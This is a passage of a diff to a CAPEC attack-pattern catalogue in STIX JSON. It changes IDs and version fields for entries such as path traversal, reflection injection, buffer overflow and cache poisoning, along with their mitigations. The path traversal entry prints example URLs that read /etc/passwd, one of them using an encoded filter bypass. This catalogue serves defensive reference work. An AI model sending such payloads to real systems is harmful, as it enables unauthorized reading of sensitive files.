"course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--12565d74-5667-4735-87b2-250426c7a382", - "source_ref": "course-of-action--b47eac39-b263-4c1e-8d06-d1f2040af7be", + "id": "relationship--a368132d-2ecf-40b4-8ce3-5f5933f296fd", + "source_ref": "course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580", "relationship_type": "mitigates", - "target_ref": "attack-pattern--24bbcaec-19bb-4964-b8a1-cd6421844123" + "target_ref": "attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-137-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Treat all user input as untrusted data that must be validated before use.", "type": "course-of-action", - "id": "course-of-action--efbad033-efe9-42e8-b02e-348858e602cb" + "id": "course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c5bf6340-d86b-4755-8880-4c3d3fb03ab9", - "source_ref": "course-of-action--efbad033-efe9-42e8-b02e-348858e602cb", + "id": "relationship--766d79dd-2f1c-40d2-bad8-1bcedb71e216", + "source_ref": "course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--24bbcaec-19bb-4964-b8a1-cd6421844123" + "target_ref": "attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55" }, { "name": "Reflection Injection", "description": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -4954,15 +4995,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--69751d83-66c8-47d3-b173-f965acb7a203" + "id": "attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929" }, { "name": "Relative Path Traversal", "description": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -5027,117 +5069,118 @@ "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--75e490a3-1306-4d4a-9328-966e355b558e" + "id": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-139-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", "type": "course-of-action", - "id": "course-of-action--4d10e12e-f94a-423f-b999-7813047f56f2" + "id": "course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4db3318e-06f5-461f-8a69-0daf37265a87", - "source_ref": "course-of-action--4d10e12e-f94a-423f-b999-7813047f56f2", + "id": "relationship--2c9420b0-57bf-42b8-9620-4fcd3498da62", + "source_ref": "course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704", "relationship_type": "mitigates", - "target_ref": "attack-pattern--75e490a3-1306-4d4a-9328-966e355b558e" + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7821a62c-15a4-4852-ad53-0793d5cde9e3", - "source_ref": "course-of-action--72ce3172-3c82-41af-ab0d-889a1f4d31b6", + "id": "relationship--6b1da7b9-e3e0-4cbb-a0fb-b35efd9915fb", + "source_ref": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--75e490a3-1306-4d4a-9328-966e355b558e" + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c9aae7be-e364-4dab-aa44-9e699e288928", - "source_ref": "course-of-action--9953201a-e853-49b4-8ef4-c440e23164c6", + "id": "relationship--c5326510-c7fc-46a8-8c26-23e60ac15beb", + "source_ref": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--75e490a3-1306-4d4a-9328-966e355b558e" + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-139-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Prefer working without user input when using file system calls", "type": "course-of-action", - "id": "course-of-action--4db904a4-2e9f-454d-bc2f-bbaff98bdd3f" + "id": "course-of-action--29a42808-e171-48df-affd-22dfaa3718b1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4a170876-1d4a-4cc8-94ce-8150c4ede329", - "source_ref": "course-of-action--4db904a4-2e9f-454d-bc2f-bbaff98bdd3f", + "id": "relationship--b351048d-671f-4e59-8dfd-d6c494ec0a3d", + "source_ref": "course-of-action--29a42808-e171-48df-affd-22dfaa3718b1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--75e490a3-1306-4d4a-9328-966e355b558e" + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--88f7f3bd-7c10-4e1e-80bf-9ce865fdea5d", - "source_ref": "course-of-action--0724227e-ebfe-4a31-a6c1-f2efae56cb23", + "id": "relationship--418ae38a-5f47-4d2b-a587-8a3d06f52e18", + "source_ref": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828", "relationship_type": "mitigates", - "target_ref": "attack-pattern--75e490a3-1306-4d4a-9328-966e355b558e" + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3534fe24-39f7-4e6f-a3b7-0010cc4a991c", - "source_ref": "course-of-action--92a98fdf-e5e4-4e90-8fe8-21de71ac3c5d", + "id": "relationship--ccf3323d-a371-4ec9-8947-290aa02ec914", + "source_ref": "course-of-action--2248876f-47b7-4818-9150-38be47817f40", "relationship_type": "mitigates", - "target_ref": "attack-pattern--75e490a3-1306-4d4a-9328-966e355b558e" + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2" }, { "name": "Client-side Injection-induced Buffer Overflow", "description": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -5227,179 +5270,180 @@ "\n Attack Example: Buffer Overflow in Internet Explorer 4.0 Via EMBED Tag\n Authors often use tags in HTML documents. For example\n \n If an attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "id": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-14-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "The client software should not install untrusted code from a non-authenticated server.", "type": "course-of-action", - "id": "course-of-action--cf45ee3b-ccf7-42b3-8d7e-f985879aa6b1" + "id": "course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2efd2e58-cebb-468a-b670-300b01b25c57", - "source_ref": "course-of-action--cf45ee3b-ccf7-42b3-8d7e-f985879aa6b1", + "id": "relationship--4d534e82-995b-4514-b92f-1c323150cc3d", + "source_ref": "course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-14-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.", "type": "course-of-action", - "id": "course-of-action--1dfa47dc-ae05-4388-89d8-d62eb47dab60" + "id": "course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b8fa82ac-aa17-4542-a5ca-e3799d78481d", - "source_ref": "course-of-action--1dfa47dc-ae05-4388-89d8-d62eb47dab60", + "id": "relationship--ffe18c13-75af-4579-9329-168b3296cf71", + "source_ref": "course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-14-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Perform input validation for length of buffer inputs.", "type": "course-of-action", - "id": "course-of-action--f756464b-2d29-4365-a7f2-96e447254a30" + "id": "course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dd32c529-46b5-45a6-bb46-c33cd8184d82", - "source_ref": "course-of-action--f756464b-2d29-4365-a7f2-96e447254a30", + "id": "relationship--8a4b7fe3-ad82-4086-9b30-6e5efcadea92", + "source_ref": "course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2326a6ed-dd17-48a8-b1a4-9c45db9ca8a4", - "source_ref": "course-of-action--f80bedd2-ad06-4cf0-a5e5-f4fb70c030dd", + "id": "relationship--81c7a7f1-9308-4649-aa22-24e65e541d6c", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-14-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use an abstraction library to abstract away risky APIs. Not a complete solution.", "type": "course-of-action", - "id": "course-of-action--c7d11ced-943e-4974-acf9-b8932232feac" + "id": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8dae9256-29c6-4336-97a8-bc98dfa3e79b", - "source_ref": "course-of-action--c7d11ced-943e-4974-acf9-b8932232feac", + "id": "relationship--027de0e5-e9fc-416d-befd-217351bd315b", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b410fc97-676c-40e7-abe1-6dce3e8331af", - "source_ref": "course-of-action--7dee5d10-4d7e-4583-873d-8ec182af868a", + "id": "relationship--72d350b0-5225-47f7-baf0-eb7bf6f723a7", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-14-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure all buffer uses are consistently bounds-checked.", "type": "course-of-action", - "id": "course-of-action--0eacbabf-6008-492a-9ab3-a2ad9edc0402" + "id": "course-of-action--c1177fe7-2157-4379-b994-7102720779ab" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7baee445-7613-412d-bed3-14396b0a1a8c", - "source_ref": "course-of-action--0eacbabf-6008-492a-9ab3-a2ad9edc0402", + "id": "relationship--ea2abd6b-96e4-435c-a8dd-b19f7bce8721", + "source_ref": "course-of-action--c1177fe7-2157-4379-b994-7102720779ab", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--172d9d18-a13e-4fad-8ab3-aa364fbe076f", - "source_ref": "course-of-action--d90f904e-47fc-4260-974a-5c0fa7a418c1", + "id": "relationship--95cf9e22-8502-4284-8803-e6b51f5e3520", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e5b34d32-1773-40bf-92a7-dc954909c03d" + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf" }, { "name": "Bypassing of Intermediate Forms in Multiple-Form Sets", "description": "Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -5424,18 +5468,19 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9c52119f-1512-4e33-998b-076f1aba8859" + "id": "attack-pattern--40c3e8e6-25a4-407e-b4f4-4d245b363bf8" }, { "name": "Cache Poisoning", "description": "An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-01-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -5500,65 +5545,66 @@ "\n DNS cache poisoning example\n In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ea46892f-7aa1-4fca-a91b-8ceb28af7c11" + "id": "attack-pattern--9484743d-53ab-4f6f-81e9-cde4ac98307b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-01-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-141-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Configuration: Disable client side caching.", "type": "course-of-action", - "id": "course-of-action--0a9b05d0-f326-4d2c-9c09-31e4956b2f20" + "id": "course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-01-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--edf7b4e4-5e7d-4a63-a6b1-1e93b5b3c635", - "source_ref": "course-of-action--0a9b05d0-f326-4d2c-9c09-31e4956b2f20", + "id": "relationship--b146ae5b-3105-49dd-946f-8ad19f54a35a", + "source_ref": "course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ea46892f-7aa1-4fca-a91b-8ceb28af7c11" + "target_ref": "attack-pattern--9484743d-53ab-4f6f-81e9-cde4ac98307b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-01-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-141-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.", "type": "course-of-action", - "id": "course-of-action--9f7a93ff-6bb7-45e0-bd61-602d7b7e5576" + "id": "course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-01-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9fd2e677-a83d-4e7f-8cad-e7c9ba188a34", - "source_ref": 